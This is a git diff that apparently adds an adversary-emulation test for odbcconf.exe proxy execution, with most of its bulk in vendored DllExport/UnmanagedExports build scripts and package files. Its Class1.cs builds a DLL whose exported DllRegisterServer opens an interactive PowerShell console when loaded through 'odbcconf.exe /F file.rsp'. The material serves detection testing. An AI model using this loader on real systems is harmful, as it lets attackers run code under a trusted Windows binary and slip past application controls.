diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/UnmanagedExports.1.2.7.nupkg b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/UnmanagedExports.1.2.7.nupkg
new file mode 100644
index 00000000..ad4bc322
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/UnmanagedExports.1.2.7.nupkg differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/lib/net/RGiesecke.DllExport.Metadata.dll b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/lib/net/RGiesecke.DllExport.Metadata.dll
new file mode 100644
index 00000000..bec9cf62
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/lib/net/RGiesecke.DllExport.Metadata.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/DllExportCmdLets.psm1 b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/DllExportCmdLets.psm1
new file mode 100644
index 00000000..481afac8
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/DllExportCmdLets.psm1
@@ -0,0 +1,105 @@
+function Remove-OldDllExportFolder {
+ param($project)
+ $defaultFiles = ('DllExportAttribute.cs',
+ 'Mono.Cecil.dll',
+ 'RGiesecke.DllExport.dll',
+ 'RGiesecke.DllExport.pdb',
+ 'RGiesecke.DllExport.MSBuild.dll',
+ 'RGiesecke.DllExport.MSBuild.pdb',
+ 'RGiesecke.DllExport.targets')
+
+ $projectFile = New-Object 'System.IO.FileInfo'($project.FullName)
+
+ $projectFile.Directory.GetDirectories("DllExport") | Select-Object -First 1 | % {
+ $dllExportDir = $_
+
+ if($dllExportDir.GetDirectories().Count -eq 0){
+ $unknownFiles = $dllExportDir.GetFiles() | Select -ExpandProperty Name | ? { -not $defaultFiles -contains $_ }
+
+ if(-not $unknownFiles){
+ Write-Host "Removing 'DllExport' from " $project.Name
+ $project.ProjectItems | ? { $_.Name -ieq 'DllExport' } | % {
+ $_.Remove()
+ }
+
+ Write-Host "Deleting " $dllExportDir.FullName " ..."
+ $dllExportDir.Delete($true)
+ }
+ }
+ }
+}
+
+function Remove-OldDllExportFolders {
+ Get-Project -all | % {
+ Remove-OldDllExportFolder $_
+ }
+}
+
+function Get-DllExportMsBuildProjectsByFullName([String] $fullName) {
+ $msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+ $msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+ if(!$msBuildV4) {
+ throw New-Object 'System.IO.FileNotFoundException'("Could not load $msBuildV4Name.")
+ }
+
+ $projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+ return $projectCollection::GlobalProjectCollection.GetLoadedProjects($fullName)
+}
+
+function Get-AllDllExportMsBuildProjects {
+ (Get-Project -all | % {
+ Get-DllExportMsBuildProjectsByFullName $_.FullName
+ }) | ? {
+ return ($_.Xml.Imports | ? {
+ "RGiesecke.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project);
+ }).Length -gt 0;
+ }
+}
+
+function Assert-PlatformTargetOfProject([String] $fullName) {
+ $proj = Get-DllExportMsBuildProjectsByFullName $fullName
+
+ if(!$proj) {
+ return;
+ }
+
+ $platformTarget = $proj.GetPropertyValue('PlatformTarget');
+
+ if(!$platformTarget -or ($platformTarget -ine 'x86' -and $platformTarget -ine 'x64')) {
+ $projectName = [IO.Path]::GetFileNameWithoutExtension($fullName);
+ if(!$platformTarget) {
+ $platformTarget = "has no platform target";
+ } else {
+ $platformTarget = "has a platform target of '$platformTarget'";
+ }
+ Write-Warning "The project '$projectName' $platformTarget. Only x86 or x64 assemblies can export functions."
+ Write-Host ""
+ }
+}
+
+function Set-NoDllExportsForAnyCpu([String] $projectName, [System.Nullable[bool]] $value) {
+ $projects = Get-AllDllExportMsBuildProjects;
+
+ [String] $asString = $value;
+
+ if($projectName) {
+ $projects = $projects | where { $_.Name -ieq $projectName };
+ }
+ $propertyName = 'NoDllExportsForAnyCpu';
+
+ $projects = $projects | where {
+ $_.GetPropertyValue($propertyName) -ine $asString
+ } | % {
+ $_.SetProperty($propertyName, $asString);
+ }
+}
+
+Export-ModuleMember Set-NoDllExportsForAnyCpu
+
+Export-ModuleMember Remove-OldDllExportFolder
+Export-ModuleMember Remove-OldDllExportFolders
+Export-ModuleMember Get-DllExportMsBuildProjectsByFullName
+Export-ModuleMember Get-AllDllExportMsBuildProjects
+Export-ModuleMember Assert-PlatformTargetOfProject
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/Mono.Cecil.dll b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/Mono.Cecil.dll
new file mode 100644
index 00000000..8cf15a12
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/Mono.Cecil.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.dll b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.dll
new file mode 100644
index 00000000..ba22ab10
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.pdb b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.pdb
new file mode 100644
index 00000000..79a2a6cb
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.MSBuild.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.dll b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.dll
new file mode 100644
index 00000000..5a77fe73
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.dll differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.pdb b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.pdb
new file mode 100644
index 00000000..e0e571ab
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.pdb differ
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets
new file mode 100644
index 00000000..dd63ee1f
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets
@@ -0,0 +1,75 @@
+
+
+
+
+
+ $(PostBuildEventDependsOn);
+ RGieseckeDllExport
+
+
+
+
+
+ $(BuildDependsOn);
+ RGieseckeDllExport
+
+
+
+
+
+
+
+
+
+
+
+ RGiesecke.DllExport.DllExportAttribute
+ RGiesecke.DllExport.Metadata
+
+ $(Platform)
+ $(PlatformTarget)
+ $(CpuType)
+ $(DebugSymbols)
+ false
+ $(DllExportTimeout)
+ $(KeyContainerName)$(AssemblyKeyContainerName)
+ $(KeyOriginatorFile)
+ $(MSBuildProjectDirectory)
+ $(TargetPath)
+ $(TargetedFrameworkDir);$(TargetFrameworkDirectory)
+ $(DevEnvDir)\..\..\VC\bin
+ $(DevEnvDir)
+ $(TargetFrameworkVersion)
+ $(TargetFrameworkSDKToolsDirectory)
+ $(NoDllExportsForAnyCpu)
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/init.ps1 b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/init.ps1
new file mode 100644
index 00000000..03ebad40
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/init.ps1
@@ -0,0 +1,12 @@
+param($installPath, $toolsPath, $package, $project)
+
+Import-Module (Join-Path $toolsPath DllExportCmdLets.psm1)
+
+if($project) {
+ Assert-PlatformTargetOfProject $project.FullName
+}
+else {
+ Get-AllDllExportMsBuildProjects | % {
+ Assert-PlatformTargetOfProject $_.FullPath
+ }
+}
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/install.ps1 b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/install.ps1
new file mode 100644
index 00000000..3f4cefd6
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/install.ps1
@@ -0,0 +1,52 @@
+param($installPath, $toolsPath, $package, $project)
+
+$targetFileName = 'RGiesecke.DllExport.targets'
+$targetFileName = [IO.Path]::Combine($toolsPath, $targetFileName)
+$targetUri = New-Object Uri -ArgumentList $targetFileName, [UriKind]::Absolute
+
+$msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+$msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+if(!$msBuildV4) {
+ throw New-Object System.IO.FileNotFoundException("Could not load $msBuildV4Name.");
+}
+
+$projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+# change the reference to RGiesecke.DllExport.Metadata.dll to not be copied locally
+
+$project.Object.References | ? {
+ $_.Name -ieq "RGiesecke.DllExport.Metadata"
+} | % {
+ if($_ | Get-Member | ? {$_.Name -eq "CopyLocal"}){
+ $_.CopyLocal = $false
+ }
+}
+
+$projects = $projectCollection::GlobalProjectCollection.GetLoadedProjects($project.FullName)
+$projects | % {
+ $currentProject = $_
+
+ # remove imports of RGiesecke.DllExport.targets from this project
+ $currentProject.Xml.Imports | ? {
+ return ("RGiesecke.DllExport.targets" -ieq [IO.Path]::GetFileName($_.Project))
+ } | % {
+ $currentProject.Xml.RemoveChild($_);
+ }
+
+ # remove the properties DllExportAttributeFullName and DllExportAttributeAssemblyName
+ $currentProject.Xml.Properties | ? {
+ $_.Name -eq "DllExportAttributeFullName" -or $_.Name -eq "DllExportAttributeAssemblyName"
+ } | % {
+ $_.Parent.RemoveChild($_)
+ }
+
+ $projectUri = New-Object Uri -ArgumentList $currentProject.FullPath, [UriKind]::Absolute
+ $relativeUrl = $projectUri.MakeRelative($targetUri)
+ $import = $currentProject.Xml.AddImport($relativeUrl)
+ $import.Condition = "Exists('$relativeUrl')";
+
+ # remove the old stuff in the DllExports folder from previous versions, (will check that only known files are in it)
+ Remove-OldDllExportFolder $project
+ Assert-PlatformTargetOfProject $project.FullName
+}
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/uninstall.ps1 b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/uninstall.ps1
new file mode 100644
index 00000000..cc535aef
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/uninstall.ps1
@@ -0,0 +1,17 @@
+param($installPath, $toolsPath, $package, $project)
+
+$targetFileName = 'RGiesecke.DllExport.targets'
+$targetFileName = [System.IO.Path]::Combine($toolsPath, $targetFileName)
+$targetUri = New-Object Uri($targetFileName, [UriKind]::Absolute)
+
+$projects = Get-DllExportMsBuildProjectsByFullName($project.FullName)
+
+return $projects | % {
+ $currentProject = $_
+
+ $currentProject.Xml.Imports | ? {
+ "RGiesecke.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project)
+ } | % {
+ $currentProject.Xml.RemoveChild($_)
+ }
+}
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/Class1.cs b/atomics/T1218.008/src/odbcconf net.40/Class1.cs
new file mode 100644
index 00000000..5ce28407
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/Class1.cs
@@ -0,0 +1,75 @@
+//odbcconf.exe /F file.rsp
+
+using System;
+using System.Runtime.InteropServices;
+using System.Collections.ObjectModel;
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+using System.Text;
+using odbc;
+
+public class Test
+{
+
+ [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+ public static bool DllRegisterServer()
+ {
+ while (true)
+ {
+ AllocConsole();
+ IntPtr defaultStdout = new IntPtr(7);
+ IntPtr currentStdout = GetStdHandle(StdOutputHandle);
+ Console.Write("PS >");
+ string x = Console.ReadLine();
+ try
+ {
+ Console.WriteLine(RunPSCommand(x));
+ }
+ catch (Exception e)
+ {
+ Console.WriteLine(e.Message);
+ }
+ }
+ return true;
+ }
+ //Based on Jared Atkinson's And Justin Warner's Work
+ public static string RunPSCommand(string cmd)
+ {
+ //Init stuff
+ Runspace runspace = RunspaceFactory.CreateRunspace();
+ runspace.Open();
+ RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+ Pipeline pipeline = runspace.CreatePipeline();
+
+ //Add commands
+ pipeline.Commands.AddScript(cmd);
+
+ //Prep PS for string output and invoke
+ pipeline.Commands.Add("Out-String");
+ Collection results = pipeline.Invoke();
+ runspace.Close();
+
+ //Convert records to strings
+ StringBuilder stringBuilder = new StringBuilder();
+ foreach (PSObject obj in results)
+ {
+ stringBuilder.Append(obj.ToString().TrimEnd('\r', '\n'));
+ }
+ return stringBuilder.ToString().Trim();
+ }
+
+ public static void RunPSFile(string script)
+ {
+ PowerShell ps = PowerShell.Create();
+ ps.AddScript(script).Invoke();
+ }
+
+ private const UInt32 StdOutputHandle = 0xFFFFFFF5;
+ [DllImport("kernel32.dll")]
+ private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
+ [DllImport("kernel32.dll")]
+ private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
+ [DllImport("kernel32")]
+ static extern bool AllocConsole();
+
+}
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/Properties/AssemblyInfo.cs b/atomics/T1218.008/src/odbcconf net.40/Properties/AssemblyInfo.cs
new file mode 100644
index 00000000..038a74d5
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("odbc")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("odbc")]
+[assembly: AssemblyCopyright("Copyright © 2017")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("12614e54-5c05-4278-8f76-f1940f87a352")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/atomics/T1218.008/src/odbcconf net.40/odbcconf.csproj b/atomics/T1218.008/src/odbcconf net.40/odbcconf.csproj
new file mode 100644
index 00000000..95726f10
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/odbcconf.csproj
@@ -0,0 +1,63 @@
+
+
+
+
+ Debug
+ AnyCPU
+ {12614E54-5C05-4278-8F76-F1940F87A352}
+ Library
+ Properties
+ odbc
+ odbc
+ v4.5
+ 512
+
+ odbc
+ true
+ 1
+ false
+ false
+
+
+ true
+ full
+ false
+ bin\Debug\
+ DEBUG;TRACE
+ prompt
+ 4
+ x64
+ false
+
+
+ pdbonly
+ true
+ bin\Release\
+ TRACE
+ prompt
+ 4
+ false
+
+
+
+ packages\DllExport.1.5.2\lib\net20\DllExport.dll
+ False
+
+
+
+
+ False
+ ..\..\..\..\..\..\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0\System.Management.Automation.dll
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/odbcconf.sln b/atomics/T1218.008/src/odbcconf net.40/odbcconf.sln
new file mode 100644
index 00000000..e1c982f9
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/odbcconf.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.26228.4
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "odbcconf", "odbcconf.csproj", "{12614E54-5C05-4278-8F76-F1940F87A352}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {12614E54-5C05-4278-8F76-F1940F87A352}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {12614E54-5C05-4278-8F76-F1940F87A352}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {12614E54-5C05-4278-8F76-F1940F87A352}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {12614E54-5C05-4278-8F76-F1940F87A352}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages.config b/atomics/T1218.008/src/odbcconf net.40/packages.config
new file mode 100644
index 00000000..2cfa733e
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages.config
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/3rd-party.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/3rd-party.txt
new file mode 100644
index 00000000..6b51b501
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/3rd-party.txt
@@ -0,0 +1,16 @@
+DllExport [ github.com/3F/DllExport ]
+- - - - - - - - - - - - - - - - - - -
+
+# Third-party software components
+
+## The DllExport includes:
+
+ * CoreCLR / ILAsm / ILDasm [ github.com/3F/coreclr ]
+ * Mono.Cecil [ github.com/jbevain/cecil ]
+ * SDK reference assemblies for PowerShell version 5 [ github.com/PowerShell/ ]
+
+## Maintenance of this project also includes:
+
+ * vsSolutionBuildEvent /+ CI.MSBuild [ github.com/3F/vsSolutionBuildEvent ]
+ * GetNuTool [ github.com/3F/GetNuTool ]
+
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/DllExport.1.5.2.nupkg b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/DllExport.1.5.2.nupkg
new file mode 100644
index 00000000..3d083fdd
Binary files /dev/null and b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/DllExport.1.5.2.nupkg differ
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/License.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/License.txt
new file mode 100644
index 00000000..443e13aa
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/License.txt
@@ -0,0 +1,22 @@
+The MIT License (MIT)
+
+Copyright (c) 2009-2015 Robert Giesecke
+Copyright (c) 2016-2017 Denis Kuzmin
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/Readme.md b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/Readme.md
new file mode 100644
index 00000000..7ad3c028
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/Readme.md
@@ -0,0 +1,188 @@
+# [DllExport](https://github.com/3F/DllExport)
+
+*Unmanaged Exports ( .NET DllExport )*
+
+```
+Copyright (c) 2009-2015 Robert Giesecke
+Copyright (c) 2016-2017 Denis Kuzmin
+```
+
+[](https://ci.appveyor.com/project/3Fs/dllexport/branch/master)
+[](https://www.nuget.org/packages/DllExport/)
+[](https://github.com/3F/DllExport/blob/master/LICENSE)
+
+
+```csharp
+[DllExport("Init", CallingConvention.Cdecl)]
+public static int entrypoint(IntPtr L)
+{
+ // ... it will be called from Lua script
+
+ lua_pushcclosure(L, onProc, 0);
+ lua_setglobal(L, "onKeyDown");
+
+ return 0;
+}
+```
+
+* **For work with Unmanaged code/libraries (binding between .NET and C/C++ etc.), see [Conari](https://github.com/3F/Conari)**
+* If you need convenient work with Lua (5.1, 5.2, 5.3, ...), see [LunaRoad](https://github.com/3F/LunaRoad)
+
+```csharp
+[DllExport("Init", CallingConvention.Cdecl)]
+// __cdecl is the default calling convention for our library as and for C and C++ programs
+[DllExport(CallingConvention.StdCall)]
+[DllExport("MyFunc")]
+[DllExport]
+```
+
+Support of Modules: Library (**.dll**) and Executable (**.exe**) [[?](https://github.com/3F/DllExport/issues/18)]
+
+
+Where to look ? v1.2+ provides dynamic definitions of namespaces (ddNS feature), thus you can use what you want - details **[here](https://github.com/3F/DllExport/issues/2)**
+
+```cpp
+ Via Cecil or direct modification:
+
+ Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
+
+ 000005B0 00 C4 7B 01 00 00 00 2F 00 12 05 .Ä{..../...
+ 000005C0 00 00 02 00 00 00 00 00 00 00 00 00 00 00 26 00 ..............&.
+ 000005D0 20 02 00 00 00 00 00 00 00 49 2E 77 61 6E 74 2E ........I.want. <<<-
+ 000005E0 74 6F 2E 66 6C 79 00 00 00 00 00 00 00 00 00 00 to.fly.......... <<<-
+```
+
+[](#)
+[](https://github.com/3F/DllExport/issues/11#issuecomment-250907940)
+
+----
+
+
+[Initially](https://github.com/3F/DllExport/issues/3) the original tool `UnmanagedExports` was distributed by Robert Giesecke as an closed-source tool **under the [MIT License](https://opensource.org/licenses/mit-license.php)**:
+
+* [Official page](https://sites.google.com/site/robertgiesecke/Home/uploads/unmanagedexports) - *posted Jul 9, 2009 [ updated Dec 19, 2012 ]*
+* [Official NuGet Packages](https://www.nuget.org/packages/UnmanagedExports)
+
+Now, we will be more open ! all details [here](https://github.com/3F/DllExport/issues/3)
+
+## License
+
+It still under the [MIT License (MIT)](https://github.com/3F/DllExport/blob/master/LICENSE) - be a ~free~ and open
+
+## &
+
+### How it works
+
+Current features has been implemented through [ILDasm](https://github.com/3F/coreclr/tree/master/src/ildasm) & [ILAsm](https://github.com/3F/coreclr/tree/master/src/ilasm) that does the all required steps via `.export` directive.
+
+**What inside ? or how works the .export directive ?**
+
+Read about format PE32/PE32+, start with grammar from asmparse and move to writer:
+
+```cpp
+...
+if(PASM->m_pCurMethod->m_dwExportOrdinal == 0xFFFFFFFF)
+{
+ PASM->m_pCurMethod->m_dwExportOrdinal = $3;
+ PASM->m_pCurMethod->m_szExportAlias = $6;
+ if(PASM->m_pCurMethod->m_wVTEntry == 0) PASM->m_pCurMethod->m_wVTEntry = 1;
+ if(PASM->m_pCurMethod->m_wVTSlot == 0) PASM->m_pCurMethod->m_wVTSlot = $3 + 0x8000;
+}
+...
+EATEntry* pEATE = new EATEntry;
+pEATE->dwOrdinal = pMD->m_dwExportOrdinal;
+pEATE->szAlias = pMD->m_szExportAlias ? pMD->m_szExportAlias : pMD->m_szName;
+pEATE->dwStubRVA = EmitExportStub(pGlobalLabel->m_GlobalOffset+dwDelta);
+m_EATList.PUSH(pEATE);
+...
+// logic of definition of records into EXPORT_DIRECTORY (see details from PE format)
+HRESULT Assembler::CreateExportDirectory()
+{
+...
+ IMAGE_EXPORT_DIRECTORY exportDirIDD;
+ DWORD exportDirDataSize;
+ BYTE *exportDirData;
+ EATEntry *pEATE;
+ unsigned i, L, ordBase = 0xFFFFFFFF, Ldllname;
+ ...
+ ~ now we're ready to miracles ~
+```
+
+or read my short explanations from here: [DllMain & the export-table](https://github.com/3F/DllExport/issues/5#issuecomment-240697109); [DllExport.dll](https://github.com/3F/DllExport/issues/28#issuecomment-281957212); [.exp & .lib](https://github.com/3F/DllExport/issues/9#issuecomment-246189220); [ordinals](https://github.com/3F/DllExport/issues/8#issuecomment-245228065) ...
+
+### How to get DllExport
+
+Available variants:
+
+* NuGet PM: `Install-Package DllExport`
+* [GetNuTool](https://github.com/3F/GetNuTool): `msbuild gnt.core /p:ngpackages="DllExport"` or [gnt](https://github.com/3F/GetNuTool/releases/download/v1.5/gnt.bat) /p:ngpackages="DllExport"
+* NuGet Commandline: `nuget install DllExport`
+* [/releases](https://github.com/3F/DllExport/releases) ( [latest](https://github.com/3F/DllExport/releases/latest) )
+* [Nightly builds](https://ci.appveyor.com/project/3Fs/dllexport/history) (`/artifacts` page). But remember: It can be unstable or not work at all. Use this for tests of latest changes.
+
+### How to Build
+
+No requires additional steps for you, just build as you need.
+
+Use build.bat if you need final NuGet package as a `DllExport..nupkg` etc.
+* *You do not need to do anything inside IDE if you have installed [this plugin](https://visualstudiogallery.msdn.microsoft.com/0d1dbfd7-ed8a-40af-ae39-281bfeca2334/).*
+
+
+### How to Debug
+
+For example, find the DllExport.MSBuild project in solution:
+
+* `Properties` > `Debug`:
+ * `Start Action`: set as `Start External program`
+ * Add full path to **msbuild.exe**, for example: C:\Program Files (x86)\MSBuild\14.0\Bin\MSBuild.exe
+ * `Start Options` > `Command line arguments` write for example:
+
+```bash
+".sln" /t:Build /p:Configuration=
+```
+
+use additional `Diagnostic` key to msbuild if you need details from .targets
+```bash
+".sln" /verbosity:Diagnostic /t:Rebuild /p:Configuration=
+```
+
+Go to `Start Debugging`. Now you can debug at runtime.
+
+### coreclr - ILAsm / ILDasm
+
+We use **our custom versions of coreclr**, special for DllExport project - https://github.com/3F/coreclr
+
+This helps to avoid some problems ([like this](https://github.com/3F/DllExport/issues/17)) and more...
+
+*To build minimal version (means that it does not include all components as for original coreclr repo):*
+
+* Restore git submodule or use repo: https://github.com/3F/coreclr.git
+
+```bash
+git submodule update --init --recursive
+```
+
+*Make sure that you have installed [CMake](https://cmake.org/download/), then build simply:*
+
+```bash
+build_s all x86 x64 Release
+build_s x86 Release
+```
+
+or use
+```bash
+build_coreclr_x86.cmd
+build_coreclr_x86_x64.cmd
+```
+
+*You can also use our binaries of coreclr separately if needed:*
+
+* [](https://www.nuget.org/packages/ILAsm/)
+* Look also [here](https://github.com/3F/coreclr/issues/1)
+
+-------------
+
+**Support ?**
+
+[just a note again...](https://plus.google.com/101239554716569212042/posts/6yP64gDyum1)
+*I mentioned earlier that DllExport is not priority for me (current impl.) "- I will do something from current tasks, but guys, please support it with me" and... why so many support from me o_o*
\ No newline at end of file
diff --git a/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/changelog.txt b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/changelog.txt
new file mode 100644
index 00000000..785af0e7
--- /dev/null
+++ b/atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/changelog.txt
@@ -0,0 +1,80 @@
+DllExport - github.com/3F/DllExport
+- - - - - - - - - - - - - - - - - -
+
+[v1.5.2] 2017.03.13
+
+ * FIXED: Failing to compile in VS2017. Issue #29
+ `Error The "DllExportAppDomainIsolatedTask" task failed unexpectedly. System.ArgumentException: Requested value 'Version46' was not found.`
+
+ * FIXED: Possible error `Could not load file or assembly Microsoft.Build.Utilities or one of its dependencies.`
+ * CHANGED: Updated script for loading of the Configurator to avoid problem with old assemblies. Issue #22
+
